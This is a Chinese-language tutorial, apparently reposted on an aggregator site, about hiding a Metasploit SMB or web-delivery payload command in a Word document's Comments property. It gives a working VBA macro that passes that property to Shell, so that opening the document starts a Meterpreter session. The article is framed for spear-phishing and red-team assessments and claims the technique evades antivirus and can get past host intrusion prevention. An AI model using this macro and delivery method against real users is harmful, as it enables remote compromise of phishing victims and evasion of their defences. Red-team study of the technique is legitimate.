在 Office 文档的属性中隐藏***载荷
内容导读
互联网集市收集整理的这篇技术教程文章主要介绍了在 Office 文档的属性中隐藏***载荷,小编现在分享给大家,供广大互联网技能从业者学习和参考。文章包含2280字,纯文字阅读大概需要4分钟。
内容图文
![在 Office 文档的属性中隐藏***载荷](/upload/InfoBanner/zyjiaocheng/1005/b6eb086b2dd1412eb28c2915ac23ca26.jpg)
在 Office 文档的属性中隐藏***载荷
李白 嘶吼专业版
Microsoft Office中的文档属性通常包含与文档和各种其他元数据详细信息相关的信息。但是,此位置可用于存储并执行SMB或HTTP服务器上托管的有效载荷的命令。这将在鱼叉式网络钓鱼或红队评估期间为***者提供一些网络的初始访问权限。
Metasploit SMB交付模块可用于通过SMB服务器以DLL文件和PowerShell的形式提供有效载荷。
exploit/windows/smb/smb_delivery
该模块可以通过以下参数轻松配置:
Metasploit SMB传输有效载荷配置
将生成需要在目标上执行的命令,服务器将开始等待连接传入。
Metasploit SMB传输载荷
由于有效载荷是一个DLL文件,Rundll32实用程序需要执行这个DLL文件。上面的命令需要添加到Word文档的注释部分。
Word文档属性 - 有效载荷
该文档必须包含一个宏,执行后将触发在注释区域添加的命令。
Sub pentestlab()
Dim p As DocumentProperty
For Each p In ActiveDocument.BuiltInDocumentProperties
If p.Name = "Comments" Then
Shell (p.Value)
End If
Next
End Sub
文档属性 - Word宏
当用户打开启用宏的Word文档并运行它时,会打开一个Meterpreter会话。
Metasploit SMB交付模块——Meterpreter会话
可以通过执行以下命令与会话的开始交互:
sessionssessions -i 1
Metasploit SMB交付模块的会话
Metasploit SMB交付的 Meterpreter Shell
有一种替代方案是可以通过PowerShell来实现相同的目的。
SMB交付模块生成PowerShell***载荷
该模块将生成一个代理感知的PowerShell命令,它将从UNC路径运行有效载荷。
Metasploit SMB交付模块生成PowerShell载荷
同样,生成的PowerShell命令将需要导入到Word文档的注释中。
文档属性中的PowerShell有效内容
当宏执行时,将打开Meterpreter会话。
Metasploit SMB 交付模块——通过PowerShell Payload的Meterpreter Shell
对于在员工主机中执行深度数据包检查的企业或组织,Metasploit Web交付模块可以为PowerShell有效载荷提供服务,并使用自定义证书来封装所有通信。这将使这种***在鱼叉式钓鱼场景中更加有效。
exploit/multi/script/web_delivery
Metasploit Web 交付模块——通过文档属性获取的Meterpreter
结论
这种技术提供了一种简单的方法在Microsoft Office文档的文档属性中来隐藏恶意命令。触发有效载荷的宏不会被认为是恶意的宏,文档文件的注释部分也不会被各种杀毒软件进行检查,因为很多杀软是通过将文档上传到VirusTotal来进行检测的。
病毒查杀总结果 —— 文档属性中的有效载荷
因此,如果目标用户以某种方式确信打开并运行了宏,那么唯一能阻止这种***的是一个主机***防御系统,它将丢弃Meterpreter连接,因为没有任何东西接触到磁盘。但是可以通过使用证书来加密连接来避开HIPS。有关此技术的详细信息,请参阅文章:绕过防病毒和主机***防御系统。
内容总结
以上是互联网集市为您收集整理的在 Office 文档的属性中隐藏***载荷全部内容,希望文章能够帮你解决在 Office 文档的属性中隐藏***载荷所遇到的程序开发问题。 如果觉得互联网集市技术教程内容还不错,欢迎将互联网集市网站推荐给程序员好友。
内容备注
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 gblab@vip.qq.com 举报,一经查实,本站将立刻删除。
内容手机端
扫描二维码推送至手机访问。